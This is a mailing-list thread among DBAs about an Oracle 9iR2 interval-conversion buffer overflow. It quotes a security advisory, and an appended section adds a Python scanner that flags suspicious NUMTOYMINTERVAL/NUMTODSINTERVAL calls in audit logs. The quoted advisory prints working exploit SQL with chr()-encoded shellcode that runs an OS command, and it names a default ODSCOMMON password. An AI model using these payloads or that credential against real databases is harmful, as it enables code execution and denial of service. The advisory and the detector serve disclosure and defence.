Funnily enough, on 9.2.0.2 on HP-UX I get this:

illegal argument for function

and

desc NUMTOYMINTERVAL
object NUMTOYMINTERVAL does not exist

--- mkb <mkb125@xxxxxxxxx> wrote:
> Hmmmm.....
>
> Oracle 9.2.0.3 on Win2K, shutdown the instance and the
> Oracle service.
>
> Pretty serious bug to me.
>
> mohammed
>
> --- Jared.Still@xxxxxxxxxxx wrote:
> > Has anyone here heard of this?
> >
> > First I've seen it. Could not get the exploit to
> > work on 8i or 9i, haven't tried 10g.
> >
> > It does however cause an ORA-3113.
> >
> > Jared
> >
> > =================================
> >
> > The following security advisory is sent to the
> > securiteam mailing list, and can be found at the
> > SecuriTeam web site: http://www.securiteam.com
> >
> > - - - - - - - - -
> > Oracle Database 9ir2 Interval Conversion Buffer Overflow
> >
> > Oracle Database Server is one of the most used database servers in the
> > world; it was marketed as being unbreakable, and many people think that it is
> > one of the most secure database servers on the market.
> >
> > Oracle Database Server provides two functions that can be used with PL/SQL
> > to convert numbers to date/time intervals; these functions have buffer
> > overflow vulnerabilities.
> >
> > Vulnerable Systems:
> >  * Oracle Database version 9ir2 and prior
> >
> > When any of these conversion functions is called with a long string as the
> > second parameter, a buffer overflow occurs.
> >
> > To reproduce the overflow execute the next PL/SQL:
> > SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;
> > SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;
> >
> > Any Oracle Database user can exploit this vulnerability because access to
> > these functions can't be restricted. Exploitation of this vulnerability
> > allows an attacker to execute arbitrary code; it can also be exploited to
> > cause a DoS (denial of service), killing the Oracle server process. An attacker
> > can completely compromise the OS and database if Oracle is running on the
> > Windows platform, because Oracle must run under the local System account
> > or under an administrative account. If Oracle is running on *nix then only
> > the database could be compromised, because Oracle mostly runs under the oracle
> > user, which has restricted permissions.
> >
> > Important: Exploitation of these vulnerabilities becomes easy if Oracle Internet
> > Directory has been deployed, because Oracle Internet Directory creates a
> > database user called ODSCOMMON that has a default password ODSCOMMON; this
> > password can not be changed, so any attacker can use this user to connect
> > to the database and exploit these vulnerabilities.
> >
> > Full tests on Oracle database 9ir2 under Microsoft Windows 2000 Server and
> > Linux confirm these vulnerabilities. Versions running on other OS
> > platforms are believed to be affected too. Previous Oracle Database Server
> > versions could be affected by these vulnerabilities.
> >
> > Exploits:
> > -- These exploits should work on Windows 2000 Server and Windows XP, not
> > tested on Windows 2003.
> > -- Run any command at the end of the string
> > SELECT
> > NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||
> > chr(59) || chr(79) || chr(150) || chr(01) || chr(141) || chr(68) ||
> > chr(36) || chr(18) || chr(80) || chr(255) || chr(21) || chr(52) || chr(35)
> > || chr(148) || chr(01) || chr(255) || chr(37) || chr(172) || chr(33) ||
> > chr(148) || chr(01) || chr(32)||'echo ARE YOU SURE? >c:\Unbreakable.txt')
> > FROM DUAL;
> >
> > SELECT
> > NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||
> > chr(59) || chr(79) || chr(150) || chr(01) || chr(141) || chr(68) ||
> > chr(36) || chr(18) || chr(80) || chr(255) || chr(21) || chr(52) || chr(35)
> > || chr(148) || chr(01) || chr(255) || chr(37) || chr(172) || chr(33) ||
> > chr(148) || chr(01) || chr(32) || 'echo ARE YOU SURE? >c:\Unbreakable.txt')
> > FROM DUAL;
> >
> > Vendor Fix:
> > Go to the Oracle Metalink site, http://metalink.oracle.com.
> >
> > Vendor Contact:
> > Oracle was contacted and they released a fix without telling the public
> > nor Cesar anything and without issuing an alert.
> >
> > Additional Information:
> > The information has been provided by Cesar.
> > ================================================================================
>
> === message truncated ===
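The advisory's trigger condition is simple to state: a call to NUMTOYMINTERVAL or NUMTODSINTERVAL whose second argument is anything other than one of the documented unit names. That makes it easy to check SQL text captured from an audit trail or a statement log for calls that do not fit the legitimate pattern. The scanner below is an added example written for this thread, not code from the advisory, from Cesar, or from Oracle; it assumes the SQL text is available one statement per line (the audit lines here are constructed), and it treats the documented unit names (YEAR/MONTH for NUMTOYMINTERVAL, DAY/HOUR/MINUTE/SECOND for NUMTODSINTERVAL) as the only expected literals. Anything else (an over-long literal, a concatenation or chr() expression, a bind variable) is reported for review rather than judged malicious, since a legitimate application may pass the unit through a bind.

```python
import re

# Unit names Oracle documents as valid second arguments (case-insensitive).
VALID_UNITS = {
    "NUMTOYMINTERVAL": {"YEAR", "MONTH"},
    "NUMTODSINTERVAL": {"DAY", "HOUR", "MINUTE", "SECOND"},
}

CALL_RE = re.compile(r"\b(NUMTOYMINTERVAL|NUMTODSINTERVAL)\s*\(", re.IGNORECASE)
LITERAL_RE = re.compile(r"^'([^']*)'$")


def _extract_args(text, start):
    """Return the text between the '(' at `start` and its matching ')',
    honouring single-quoted string literals (with '' as an escaped quote).
    Returns None when the parentheses never balance."""
    depth, in_str, i = 0, False, start
    while i < len(text):
        c = text[i]
        if in_str:
            if c == "'":
                if i + 1 < len(text) and text[i + 1] == "'":
                    i += 1          # escaped quote inside the literal
                else:
                    in_str = False
        elif c == "'":
            in_str = True
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return text[start + 1:i]
        i += 1
    return None


def _split_top_level(args):
    """Split an argument list on commas that are outside strings and parens."""
    parts, cur, depth, in_str, i = [], [], 0, False, 0
    while i < len(args):
        c = args[i]
        cur.append(c)
        if in_str:
            if c == "'":
                if i + 1 < len(args) and args[i + 1] == "'":
                    cur.append("'")
                    i += 1
                else:
                    in_str = False
        elif c == "'":
            in_str = True
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
        elif c == "," and depth == 0:
            cur.pop()                       # drop the separator itself
            parts.append("".join(cur).strip())
            cur = []
        i += 1
    parts.append("".join(cur).strip())
    return parts


def classify_call(func, args_text):
    """Return (verdict, reason) for one interval conversion call."""
    func = func.upper()
    if args_text is None:
        return "suspicious", "unbalanced parentheses"
    parts = _split_top_level(args_text)
    if len(parts) != 2:
        return "suspicious", "expected 2 arguments, found %d" % len(parts)
    m = LITERAL_RE.match(parts[1])
    if not m:
        return "suspicious", "unit is not a plain string literal (concatenation, chr(), bind or expression)"
    value = m.group(1).strip().upper()
    if value in VALID_UNITS[func]:
        return "ok", "unit " + value
    return "suspicious", "unit literal of %d chars is not a documented unit name" % len(m.group(1))


def scan_sql(sql):
    """Return [(function, verdict, reason)] for every conversion call in `sql`."""
    findings = []
    for m in CALL_RE.finditer(sql):
        args = _extract_args(sql, m.end() - 1)
        verdict, reason = classify_call(m.group(1), args)
        findings.append((m.group(1).upper(), verdict, reason))
    return findings


def scan_audit_lines(lines):
    """Return only the non-ok findings as (line_no, function, reason)."""
    alerts = []
    for n, line in enumerate(lines, 1):
        for func, verdict, reason in scan_sql(line):
            if verdict != "ok":
                alerts.append((n, func, reason))
    return alerts


# Constructed sample statements, one per line, standing in for an audit trail.
SAMPLE_AUDIT_LINES = [
    "SELECT NUMTOYMINTERVAL(27, 'MONTH') FROM dual",
    "SELECT SYSDATE + NUMTODSINTERVAL(90, 'minute') FROM dual",
    "SELECT NUMTOYMINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR') FROM dual",
    "SELECT NUMTODSINTERVAL(1, 'AAAA' || chr(59) || chr(79)) FROM dual",
    "SELECT NUMTOYMINTERVAL(1, :unit) FROM dual",
]

if __name__ == "__main__":
    for line_no, func, reason in scan_audit_lines(SAMPLE_AUDIT_LINES):
        print("line %d: %s -> %s" % (line_no, func, reason))
```

The parser walks parentheses and quoted strings rather than matching on a regex alone so that a unit built from `chr()` pieces, as in the advisory's payloads, is still isolated as a single second argument. The scan is a review aid for the unpatched window only; the fix itself is the vendor patch referenced in the advisory.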